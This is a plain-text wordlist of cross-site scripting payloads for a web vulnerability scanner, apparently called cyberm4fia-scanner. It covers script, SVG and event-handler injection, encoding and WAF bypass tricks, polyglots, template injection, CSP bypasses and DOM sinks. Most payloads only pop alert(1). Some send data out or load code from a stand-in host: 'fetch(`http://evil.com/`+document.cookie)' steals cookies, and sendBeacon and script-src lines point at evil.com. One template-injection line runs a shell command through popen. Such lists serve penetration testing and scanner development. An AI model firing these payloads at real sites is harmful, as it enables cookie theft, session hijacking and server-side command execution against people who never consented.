# XSS Payloads — cyberm4fia-scanner
# Categories: Basic, Tag-based, Event-based, Encoding, WAF Bypass, Polyglot, DOM, Mutation

# ─── Basic Script Tags ───
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
</script><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>
</style><script>alert(1)</script>
</noscript><script>alert(1)</script>
</template><script>alert(1)</script>
</xmp><script>alert(1)</script>
</iframe><script>alert(1)</script>
</noembed><script>alert(1)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert`1`</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<script src=//evil.com></script>
<script>alert(1)//</script>
<script>alert(1);</script>
<script>onerror=alert;throw 1</script>
<script>{alert(1)}</script>
<script>alert(1)%0d%0a</script>

# ─── SVG / IMG / Body / Media Tags ───
<svg/onload=alert(1)>
<svg onload=alert`1`>
<svg/onload=alert(1)//
"><svg/onload=alert(1)>
<svg onload=alert&lpar;1&rpar;>
<svg><script>alert(1)</script></svg>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>
<svg/onload=alert(1) xmlns="http://www.w3.org/2000/svg">
<svg><use href="data:image/svg+xml,<svg onload=alert(1)>" />
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<img src=1 onerror=alert(1)>
<image src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<video><source onerror=alert(1)>
<video src=x onloadstart=alert(1) autoplay>
<audio src=x onloadstart=alert(1) autoplay>
<body onload=alert(1)>
<body/onload=alert(1)>
<body onpageshow=alert(1)>
<body onhashchange=alert(1)>
<body onfocus=alert(1)>
<marquee onstart=alert(1)>
<isindex type=image src=1 onerror=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<math><mtext></mtext><mglyph><svg onload=alert(1)></svg></mglyph></math>
<table background="javascript:alert(1)">

# ─── Event Handler Injection ───
" onfocus="alert(1)" autofocus x="
' onfocus='alert(1)' autofocus x='
" onmouseover="alert(1)" x="
" onclick="alert(1)" x="
" onmouseenter="alert(1)" x="
" onfocusin="alert(1)" autofocus x="
" onanimationstart="alert(1)" x="
" ontransitionend="alert(1)" x="
" onauxclick="alert(1)" x="
" onpointerover="alert(1)" x="
" oncontextmenu="alert(1)" x="
" ondblclick="alert(1)" x="
" ondrag="alert(1)" draggable="true" x="
" onwheel="alert(1)" x="
" oncut="alert(1)" contenteditable x="
" oncopy="alert(1)" x="
" onpaste="alert(1)" contenteditable x="
" oninput="alert(1)" contenteditable x="
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<details/open/ontoggle=alert(1)>
<details open ontoggle=alert(1)>
<meter onmouseover=alert(1)>0</meter>
<a onmouseover=alert(1)>hover</a>
<div onmouseover="alert(1)">hover</div>
<fieldset onfocus=alert(1) autofocus>
<output onfocus=alert(1) autofocus tabindex=0>
<summary onfocus=alert(1) autofocus tabindex=0>

# ─── Case & Encoding Bypass ───
<ScRiPt>alert(1)</sCrIpT>
<sCRipT>alert(1)</ScRiPt>
<iMg sRc=x oNeRrOr=alert(1)>
<IMG SRC=x ONERROR=alert(1)>
<scr<script>ipt>alert(1)</scr</script>ipt>
<SCRIPT>alert(1)</SCRIPT>
<script>&#97;lert(1)</script>
<script>\u0061lert(1)</script>
<script>\x61lert(1)</script>
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=&#97;lert(1)>
<img src=x onerror=&#x61;lert(1)>
<img src=x onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;(1)">
<script>al\x65rt(1)</script>
<svg onload=\u0061\u006C\u0065\u0072\u0074(1)>
<img src=x onerror="&#0000097lert(1)">
<img src=x onerror="&#x00061;lert(1)">
<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
<scr\x00ipt>alert(1)</scr\x00ipt>

# ─── URI / Protocol Handlers ───
javascript:alert(1)
javascript:alert(document.cookie)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
vbscript:MsgBox("XSS")
JaVaScRiPt:alert(1)
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
j&#97;vascript:alert(1)
javascript&#x3A;alert(1)
&#x6A;avascript:alert(1)
&#106;avascript:alert(1)
javascript:void(0);alert(1)
javascript://%0aalert(1)
javascript://comment%0aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
data:text/html;charset=utf-8,<script>alert(1)</script>

# ─── Attribute Breaking ───
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"><svg/onload=alert(1)>
'><svg/onload=alert(1)>
"><body onload=alert(1)>
'"--><script>alert(1)</script>
"'--><script>alert(1)</script>
"><input onfocus=alert(1) autofocus>
"><details/open/ontoggle=alert(1)>
"><video><source onerror=alert(1)>
"><iframe src="javascript:alert(1)">
"><iframe/src="data:text/html,<script>alert(1)</script>">
"><object data="javascript:alert(1)">
"><a href="javascript:alert(1)">click
"><img/src=`x`onerror=alert(1)>
"><embed src="javascript:alert(1)">
'><input/onfocus=alert(1) autofocus>
"><select/onfocus=alert(1) autofocus>

# ─── WAF Bypass / Advanced ───
<svg/onload=alert(1)>
<svg	onload=alert(1)>
<svg
onload=alert(1)>
<svg/onload="alert(1)">
<svg onload=alert(/1/)>
<svg onload=alert(1)//
<script>al\u0065rt(1)</script>
<script>window['alert'](1)</script>
<script>window["alert"](1)</script>
<script>this['alert'](1)</script>
<script>self['alert'](1)</script>
<script>top['alert'](1)</script>
<script>[].constructor.constructor('alert(1)')()</script>
<script>Reflect.apply(alert,null,[1])</script>
<script>eval('ale'+'rt(1)')</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>setTimeout('alert(1)',0)</script>
<script>setInterval('alert(1)',0)</script>
<script>Function('alert(1)')()</script>
<script>new Function`alert(1)``</script>
<script>throw~delete~alert(1)</script>
<img src=x onerror=alert(1)//
<img/src='x'onerror=alert(1)>
<img src=x onerror="window.onerror=alert;throw 1">
<img src=x onerror=top.alert(1)>
<img src=x onerror=parent.alert(1)>
<img src=x onerror=self.alert(1)>
<img src=x onerror=frames.alert(1)>
<x/onclick=alert(1)>click
<form><button formaction="javascript:alert(1)">X</button>
<a href="javascript:void(0)" onclick=alert(1)>click</a>
<script>navigator.sendBeacon`//evil.com`</script>
<script>location='javascript:'+atob('YWxlcnQoMSk=')</script>
<script>document.location='javascript:alert(1)'</script>

# ─── WAF Space/Slash Bypass ───
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)//>
<img%20src=x%20onerror=alert(1)>
<img%09src=x%09onerror=alert(1)>
<img%0asrc=x%0aonerror=alert(1)>
<img%0dsrc=x%0donerror=alert(1)>
<img%0bsrc=x%0bonerror=alert(1)>
<img%0csrc=x%0conerror=alert(1)>
<svg%0aonload=alert(1)>
<details%0aopen%0aontoggle=alert(1)>
<input/onfocus=alert(1)/autofocus>
<svg%09onload%09=%09alert(1)>

# ─── Null Byte / Unusual Chars ───
<scri%00pt>alert(1)</scri%00pt>
<script>al%00ert(1)</script>
<img src=x onerror=aler\x74(1)>
<img src=x onerror=al\145rt(1)>
<svg onload=al\u0065rt(1)>
<%00script>alert(1)</script>
<script%20>alert(1)</script>
<script%0a>alert(1)</script>

# ─── DOM-based XSS Sources/Sinks ───
#<img src=x onerror=alert(1)>
javascript:alert(document.domain)//
<img src=x onerror=alert(location.hash)>
<script>eval(location.hash.slice(1))</script>
<script>document.write(location.hash)</script>
<script>document.write('<img src=x onerror=alert(1)>')</script>
<script>var x=document.URL;document.write(x)</script>

# ─── Template Injection ───
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
${alert(1)}
{{constructor.constructor('alert(1)')()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
<#{7*7}>
${{7*7}}
@(7+7)
{7*7}

# ─── Framework Specific (Angular/React/Vue) ───
{{constructor.constructor('alert(1)')()}}
ng-app ng-csp><base href=//evil.com>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
<x ng-app ng-csp>{{$new.constructor('alert(1)')()}}</x>
"><ng-include src="'//evil.com/xss.html'">
{{this.constructor.constructor('alert(1)')()}}
[src]="'javascript:alert(1)'"
(load)="alert(1)"
<div v-html="'<img src=x onerror=alert(1)>'"></div>

# ─── Polyglots (multiple contexts) ───
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
';alert(1);//
"-alert(1)-"
'-alert(1)-'
\'-alert(1)//
</script><svg onload=alert(1)>
"><img src=x onerror=alert(1)><"
'"><img src=x onerror=alert(1)>/
</ScRiPt><ScRiPt>alert(1)</ScRiPt>
"-alert(1)}//
'-alert(1)}//
--></script><script>alert(1)//
"><svg/onload=alert`1`><img/src=`x`onerror=alert`1`>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert`1` )//%0D%0A%0d%0a//</stYle/</titLe/</telerik:telerik/</teXtarEa/</nOscript><sVg/oNloAd=alert`1`>//
';!--"<XSS>=&{()}
<IMG """><SCRIPT>alert(1)</SCRIPT>"\>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1);">
<<SCRIPT>alert(1)//<</SCRIPT>
<BODY BACKGROUND="javascript:alert(1)">
"><h1>XSS</h1><script>alert(1)</script>
</select><img src=x onerror=alert(1)>
</option></select><img src=x onerror=alert(1)>

# ─── Mutation XSS (mXSS) ───
<p style="animation: x]" onanimationstart=alert(1)>
<svg><style>{font-family:attr(onload)}</style><rect onload=alert(1)>
<math><mi xlink:href="data:x,<script>alert(1)</script>">
<form id=x tabindex=1 onfocus=alert(1)></form><input autofocus>
<img src=validimage.jpg onload=alert(1)>
<noscript><img src=x onerror=alert(1)></noscript>
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>click</a>
<style>@import'javascript:alert(1)'</style>
<a href="&#1;javascript:alert(1)">click</a>
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<xss onafterscriptexecute=alert(1)><script>1</script>
<xss onbeforescriptexecute=alert(1)><script>1</script>

# ─── CSP Bypass ───
<script src="data:,alert(1)"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.3/angular.min.js"></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
<link rel="preload" href="javascript:alert(1)">
<link rel="import" href="data:text/html,<script>alert(1)</script>">
<object data="data:text/html,<script>alert(1)</script>">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">

# ─── Advanced WAF Bypass & Polyglots ───
javascript://%250Aalert(1)
javascript://%25250Aalert(1)
<svg/onload=fetch(`http://evil.com/`+document.cookie)>
<svg/onload=eval(atob('YWxlcnQoMSk='))>
<script>setTimeout`alert\x281\x29`</script>
<script>setInterval`alert\x281\x29`</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function("al"+"ert(1)")()</script>
<body onload=eval(atob('YWxlcnQoMSk='))>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:eval(atob('YWxlcnQoMSk='))"></iframe>
<math><x href="javascript:alert(1)">click</x></math>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<a href="javascript:alert(1)">click here</a>
<a href="jAvAsCrIpT:alert(1)">click here</a>
<a href="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;alert(1)">click here</a>
<form action="javascript:alert(1)"><input type=submit></form>
<form id=test onformdata=alert(1)><button name=id value=test>click me</button></form>
<math><a xlink:href="javascript:alert(1)">click</a></math>

# ─── Ultimate Polyglots ───
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>"</plaintext\></|\><details/open/ontoggle=prompt`1`><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=image>
javascript://%250Aalert(1)//"onclick=alert(1)//<svg/onload=alert(1)>
";alert(1)//
';alert(1)//
\';alert(1)//
\";alert(1)//
`alert(1)`
# Pentest-Agents WAF bypass payloads
<details open ontoggle=alert(1)>
<svg/onload=alert(1)>
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<math><mtext><table><mglyph><style><!--</style><img src onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<marquee onstart=alert(1)>x</marquee>
<video><source onerror=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><animateTransform onbegin=alert(1) attributeName=transform dur=1s>
<svg><set onbegin=alert(1) attributeName=x to=y dur=1s>
<style>@keyframes x{}</style><div onanimationstart=alert(1) style=animation:x\ 1s>
<div onanimationend=alert(1) style=animation:spin\ 1s>
<div ontransitionend=alert(1) style=transition:all\ 1s>
# CSP JSONP bypass via trusted CDNs
<script src="https://www.google.com/complete/search?client=chrome&jsonp=alert(1);"></script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);"></script>
<script src="https://api.github.com/repos/user/repo?callback=alert(1);"></script>
# Constructor-chain when alert blocked
[]['constructor']['constructor']('alert(1)')()
({}).constructor.constructor('alert(1)')()
new Function('alert(1)')()
Reflect.construct(Function,['alert(1)'])()
window[atob('YWxlcnQ=')](1)
# Tag-confusion parser-differential
<scr<script>ipt>alert(1)</script>
<<script>alert(1)</script>
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<noscript><p title="</noscript><img src=x onerror=alert(1)>"></p>
# DOM XSS sinks
element.innerHTML
document.write()
eval()
setTimeout()
jQuery .html() .append()
React dangerouslySetInnerHTML
Vue v-html
Angular [innerHTML]
# postMessage listener sinks
window.addEventListener('message', e => Function(e.data)());
window.onmessage = e => document.write(e.data);
